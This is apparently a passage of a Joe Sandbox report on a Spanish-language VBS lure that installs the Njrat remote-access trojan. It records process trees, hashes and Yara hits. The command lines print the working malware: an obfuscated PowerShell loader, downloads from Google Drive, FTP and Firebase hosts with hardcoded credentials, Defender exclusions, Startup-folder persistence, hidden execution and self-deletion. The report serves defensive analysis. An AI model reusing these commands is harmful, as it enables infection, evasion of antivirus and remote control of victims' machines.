d???By???GE???d???BT???Fw???cwBt???GE???cgBn???G8???cgBQ???Fw???dQBu???GU???TQ???g???HQ???cgBh???HQ???UwBc???HM???dwBv???GQ???bgBp???Fc???X???B0???GY???bwBz???G8???cgBj???Gk???TQBc???Gc???bgBp???G0???YQBv???FI???X???Bh???HQ???YQBE???H??????c???BB???Fw???Jw???g???Cs???I???Ba???Es???bgBZ???E0???J??????g???Cg???I???Bu???G8???aQB0???GE???bgBp???HQ???cwBl???EQ???LQ???g???Cc???JQBJ???Gg???cQBS???Fg???JQ???n???C??????bQBl???HQ???SQ???t???Hk???c???Bv???EM???I??????7???C??????d???By???GE???d???Bz???GU???cgBv???G4???Lw???g???HQ???ZQBp???HU???cQ???v???C??????RwBj???Fc???aQBS???C??????ZQB4???GU???LgBh???HM???dQB3???C??????ZQB4???GU???LgBs???Gw???ZQBo???HM???cgBl???Hc???bwBw???C??????Ow???p???Cc???dQBz???G0???LgBu???Gk???dwBw???FU???X??????n???C??????Kw???g???E4???SgBU???Hg???R??????k???Cg???I??????9???C??????RwBj???Fc???aQBS???Ds???KQ???g???GU???bQBh???E4???cgBl???HM???VQ???6???Do???XQB0???G4???ZQBt???G4???bwBy???Gk???dgBu???EU???Ww???g???Cs???I??????n???Fw???cwBy???GU???cwBV???Fw???OgBD???Cc???K??????g???D0???I???Ba???Es???bgBZ???E0???J??????7???Ck???JwB1???HM???bQ???u???G4???aQB3???H??????VQBc???Cc???I??????r???C??????TgBK???FQ???e???BE???CQ???I??????s???EI???SwBM???FI???VQ???k???Cg???ZQBs???Gk???RgBk???GE???bwBs???G4???dwBv???EQ???LgBu???Eo???eQBW???Go???J??????7???Dg???RgBU???FU???Og???6???F0???ZwBu???Gk???Z???Bv???GM???bgBF???C4???d???B4???GU???V??????u???G0???ZQB0???HM???eQBT???Fs???I??????9???C??????ZwBu???Gk???Z???Bv???GM???bgBF???C4???bgBK???Hk???VgBq???CQ???Ow???p???HQ???bgBl???Gk???b???BD???GI???ZQBX???C4???d???Bl???E4???I???B0???GM???ZQBq???GI???Tw???t???Hc???ZQBO???Cg???I??????9???C??????bgBK???Hk???VgBq???CQ???OwB9???Ds???I??????p???Cc???d???BP???Ew???YwBf???Es???YQ???z???Fo???ZgBv???Fg???MgBK???Eo???cgBW???Gg???bQBW???Dk???YwBt???Dk???W???Bz???HU???W???Bt???Go???MQBn???DE???Jw???g???Cs???I???Bv???Hg???SwBV???Gc???J??????o???C??????PQ???g???G8???e???BL???FU???Zw???k???Hs???I???Bl???HM???b???Bl???H0???Ow???g???Ck???Jw???y???DQ???dQBY???Eo???V???Bx???GE???bQBn???Hk???TQB0???EY???egBh???Gs???U???BS???DE???cQBf???Ek???dgBH???Gk???W???BO???GQ???cQBh???E4???MQ???n???C??????Kw???g???G8???e???BL???FU???Zw???k???CgAIAA9ACAAbwB4AEsAVQBnACQAewAgACkAIAB1AE4AQwBWAHEAJAAgACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAHUATgBDAFYAcQAkADsAJwA9AGQAaQAmAGQAYQBvAGwAbgB3AG8AZAA9AHQAcgBvAHAAeABlAD8AYwB1AC8AbQBvAGMALgBlAGwAZwBvAG8AZwAuAGUAdgBpAHIAZAAvAC8AOgBzAHAAdAB0AGgAJwAgAD0AIABvAHgASwBV???GcAJAA7ACkAIAAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABOAEoAVAB4AEQAJAAgACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAATgBKAFQAeABEACQAewAgACkAIABQAGIAbgBFAFoAJAAgACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABQAGIAbgBFAFoAJAAgADsA';$kahlN = $qKKzc.replace('???' , 'A') ;$vQpeD = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $kahlN ) ); $vQpeD = $vQpeD[-1..-$vQpeD.Length] -join '';$vQpeD = $vQpeD.replace('%XRqhI%','C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs');powershell $vQpeD
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:41:59
Start date:	24/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:42:01
Start date:	24/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	17:42:06
Start date:	24/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	17:42:06
Start date:	24/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.2195084850.000001F542643000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:42:06
Start date:	24/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\"
Imagebase:	0x7ff73a0f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:42:08
Start date:	24/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	17:42:10
Start date:	24/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	17:42:13
Start date:	24/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000C.00000002.2263158349.0000020A2AA0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	17:42:13
Start date:	24/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c del "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"
Imagebase:	0x7ff73a0f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	17:42:16
Start date:	24/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x620000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	17:42:23
Start date:	24/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Imagebase:	0x7ff73a0f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	17:42:23
Start date:	24/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	17:42:23
Start date:	24/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000012.00000002.2358188672.000002078FFB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	17:42:23
Start date:	24/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	17:42:24
Start date:	24/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xf40000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000014.00000002.2386362117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	17:42:31
Start date:	24/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Imagebase:	0x7ff73a0f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	17:42:31
Start date:	24/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	17:42:31
Start date:	24/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000017.00000002.2442574542.0000020959177000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000017.00000002.2442574542.0000020958E27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Analysis Process: conhost.exePID: 7664, Parent PID: 7656

General

Target ID:	24
Start time:	17:42:31
Start date:	24/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	17:42:33
Start date:	24/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x840000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	17:43:30
Start date:	24/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	17:43:30
Start date:	24/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FF848C94F05 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3006295703.00007FF848C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848c90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9917f3665b61f1b4cf24688b0974a73972e94ae79d024ecab79b6f9db2d56c36
Instruction ID: fbe431e4cef9728dab6b05085cac60df7319f6ca3f997b96beb1acf0cef531e4
Opcode Fuzzy Hash: 9917f3665b61f1b4cf24688b0974a73972e94ae79d024ecab79b6f9db2d56c36
Instruction Fuzzy Hash: 3A01677111CB0D8FD744EF0CE451AA5B7E0FB99364F10056DE58AC3651D736E881CB45

Analysis Process: powershell.exePID: 1088, Parent PID: 2748COMMON

Executed Functions

Function 00007FF848C844DF Relevance: 1.7, Strings: 1, Instructions: 493COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848C8471C

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: e31c7d432e354b5e3231121cc88aa3f9cee536d25b7af28a7b72957ed9672f65
Instruction ID: a3a7bd66edf93488f1b7aff8f8f0de10ebc98f3506c9a36d18fef93cb7ef2a4c
Opcode Fuzzy Hash: e31c7d432e354b5e3231121cc88aa3f9cee536d25b7af28a7b72957ed9672f65
Instruction Fuzzy Hash: 04E1B231A0CA4D8FDB89EF5CC445AA97BE1FF69351F14416AD409D7296CB38EC82CB81

Function 00007FF848D50E18 Relevance: .5, Instructions: 549COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918907773.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb2687b628361fc0968959f3018a37bff64f4ed9b1670de6061031409acbcb7
Instruction ID: b8cff2e18b0cfcf4d0649c15d8d6dcd3a01a67d29002069ec03bc983573fb8a2
Opcode Fuzzy Hash: 8bb2687b628361fc0968959f3018a37bff64f4ed9b1670de6061031409acbcb7
Instruction Fuzzy Hash: 10F12431A0FBC54FE75AAB289855671BBE1EF5A254F1801FFD048CB193DE189C0AC396

Function 00007FF848D53C9E Relevance: .4, Instructions: 387COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918907773.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e616f2c71cc1f5d263479b0827dbaafff325b25b876807ee20915a650cba3174
Instruction ID: 697d1be451afea7ee7fed170ec3c7145bf0539f7b313a7e4f5cd5f06d0d60d6b
Opcode Fuzzy Hash: e616f2c71cc1f5d263479b0827dbaafff325b25b876807ee20915a650cba3174
Instruction Fuzzy Hash: 97B11731D1FB894FE75AAA2C58562B4BBE1EF47260F4801FFD449C7193DA189C0A8396

Function 00007FF848C87895 Relevance: .4, Instructions: 370COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0a2ceb5d79d2ab0443af2de9cda9a40c16b5b4faec7c194ef7d5f4da9f77be0
Instruction ID: 5b792b2a33446fe4177cc3db52b37407a5b2fbce9470d0659549f3e304334885
Opcode Fuzzy Hash: f0a2ceb5d79d2ab0443af2de9cda9a40c16b5b4faec7c194ef7d5f4da9f77be0
Instruction Fuzzy Hash: 45B13931A5DA494FE789EB38846667537E2EF8A340F5041BAD40EC72E3DF286C45CB91

Function 00007FF848D52B9E Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918907773.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 692be26251812cfd625ae60f37631e2c2b7b189b28327aae777ebf7331e3d292
Instruction ID: 21167acabe32856d0535b9d36e2bae94d3681fce1f59a3eead24355464e1982a
Opcode Fuzzy Hash: 692be26251812cfd625ae60f37631e2c2b7b189b28327aae777ebf7331e3d292
Instruction Fuzzy Hash: C461E622E1FE864FFB99BA2C14653B9A6D1EF556A0F4801BBD00EC71D7DE089C0D8359

Function 00007FF848D5259E Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918907773.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dacfa9fe234d2c07ee4bd2dff718a714d1d0d1823399bc30007aff59be2c912
Instruction ID: 4e0e7bced94d9dbca0245269c36453fe538f2bdfc195158cb1767d9ee686bdb0
Opcode Fuzzy Hash: 0dacfa9fe234d2c07ee4bd2dff718a714d1d0d1823399bc30007aff59be2c912
Instruction Fuzzy Hash: 1D51E522E1FE864FFB99AA2C1465379A6D1EF556A1F5800BBD00EC71C7DE08AC0D8356

Function 00007FF848C87A9F Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f465a88a5466da254b27fc537e751ac13bbb4558f513bc825f9b5dc763c2481
Instruction ID: 4221184ecb17a0b831ce3e75d2a47905c9c57fee60c0bd58553fb402f6ea8e34
Opcode Fuzzy Hash: 3f465a88a5466da254b27fc537e751ac13bbb4558f513bc825f9b5dc763c2481
Instruction Fuzzy Hash: C951D13075DA499FE788E639846233537E2EF8A385F10047DD95EC76D2DF2DA8028B25

Function 00007FF848C88200 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfb5f01b72a7867afdf57f6766532c46ee0c99fc3d1e4ef7f0c2f401e1598b2a
Instruction ID: 87ed76784c96767acc78add4ebd139ceff4b41d55127817b81e0c01d957568a3
Opcode Fuzzy Hash: bfb5f01b72a7867afdf57f6766532c46ee0c99fc3d1e4ef7f0c2f401e1598b2a
Instruction Fuzzy Hash: D541C720B2DD465FE7D9F728402627532E2EF99781F9400BAD40EC72D3DE18AC458B56

Function 00007FF848D52BEA Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918907773.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62cbe67dffe9492ae510752cca703b9c1e268dfbc8d7f046f1f0311401eb3c30
Instruction ID: b30877888a30f6a5367c3e6eaa566065ec4e0679c25302ce4f0a7245702f5e0c
Opcode Fuzzy Hash: 62cbe67dffe9492ae510752cca703b9c1e268dfbc8d7f046f1f0311401eb3c30
Instruction Fuzzy Hash: 5041C122E1FA874FF69ABA281465378A6D1EF952E0F5801BBD40EC31D7DE0C9C4D4259

Function 00007FF848D525EA Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918907773.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58b14e8e140292e6fb035e6672b63413783664a1b594ca1911e121070ff0b2e2
Instruction ID: 7ce364dd2c381905ff5b6d7585711c3b6dae56a8079480cce5d75da1f37323b5
Opcode Fuzzy Hash: 58b14e8e140292e6fb035e6672b63413783664a1b594ca1911e121070ff0b2e2
Instruction Fuzzy Hash: 9031A462E1FA874FFB99BA281469378A5D1EF556A2F4800BBD40EC31D3DE0C9C4C435A

Function 00007FF848D53E21 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918907773.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc22cee69a4739172e1c6ca51ea36d58c6a40b0f34a3b6343348e5b4ac62ff2a
Instruction ID: cdab5bdb836eb3cd80d3ee0fa700ecbc7220b0dfe0645a626f6108e026bc1368
Opcode Fuzzy Hash: fc22cee69a4739172e1c6ca51ea36d58c6a40b0f34a3b6343348e5b4ac62ff2a
